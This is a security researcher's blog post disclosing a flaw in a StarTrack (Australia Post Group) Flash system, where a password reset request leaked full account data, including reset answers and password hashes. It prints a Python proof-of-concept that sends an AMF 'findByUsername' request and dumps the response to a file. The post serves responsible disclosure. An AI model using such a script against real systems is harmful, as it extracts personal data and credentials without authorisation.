Australia Post Group – Sensitive Information Leakage

in Python, Security, Web application security

I recently discovered a severe vulnerability present in a key system owned by StarTrack. What was particularly unusual about this vulnerability was that it didn’t require any sort of unusual payload to exploit – account data was being leaked within the normal processes of the system.

Specifically, merely requesting a password reset from the login page was enough to cause the application to respond with a complete dump of the account information. This information included:

  • Account holder contact information
  • Internal account manager contact information
  • Account permissions
  • Password reset question and answer
  • Password (salted & hashed)

Since the vulnerable system was flash-based, the calls it made were in a special format which I had not had much previous experience with – Action Message Format. This is a format which is used a lot by web applications with Adobe Flash components. The request and response look similar in structure to a SOAP API, although this data was almost entirely in binary – making it a little more difficult to explain in the report how to reproduce the issue.

I ended up writing a small Python script which would prompt for the account username, encode the data and send it off in AMF format, then take the response data, decode it to ASCII, then write that to a dump file. See below:


import pyamf
from pyamf import remoting
from pyamf.flex import messaging
import uuid
import requests

#nice author's note upon executing the script
def border_msg(msg):
row = len(msg)
h = ''.join(['+'] + ['-' *row] + ['+'])
result= h + '\n'"|"+msg+"|"'\n' + h
print(result)

border_msg("\nCopyright 2018, Daniel Wallace | daniel@danielwallace.com.au\nThis code serves as a proof-of-concept for the StarTrack ***** system data leakage vulnerability, and may only be used for the purpose of vulnerability assessment.\n")

account = input("Please enter username:")
msg = messaging.RemotingMessage(operation='findByUsername',
destination='accountManager',

#UUID doesn't really matter, can be any string. Included a random valid UUID though for good measure
messageId=str(uuid.uuid4()).upper(),
body=[account])
req = remoting.Request(target='null', body=[msg])
ev = remoting.Envelope(pyamf.AMF3)
ev['/2'] = req

# Encode request
bin_msg = remoting.encode(ev)

# Send request
resp = requests.post('redactedurl',
data=bin_msg.getvalue(),
headers={'Content-Type': 'application/x-amf'})

# Decode response
resp_msg = remoting.decode(resp.content)
print(resp_msg.bodies)

f = open(account+".txt", "x")
with open(account+".txt", "w") as f:
for item in resp_msg:
f.write(str(item))
print("Wrote account details to "+account+".txt")

Once this script was complete, I sent off the full report to Australia Post Group, as per their Responsible Disclosure Policy. They took a day or so to verify the issue – which is fair, seeing as the script had a few dependencies – then the affected endpoint was promptly taken offline.

Their security team were a pleasure to work with and have been considerate enough to keep me informed throughout the entire process as they investigate and analyse the impact.

The company has since initiated a full investigation into the affected system. This investigation is ongoing.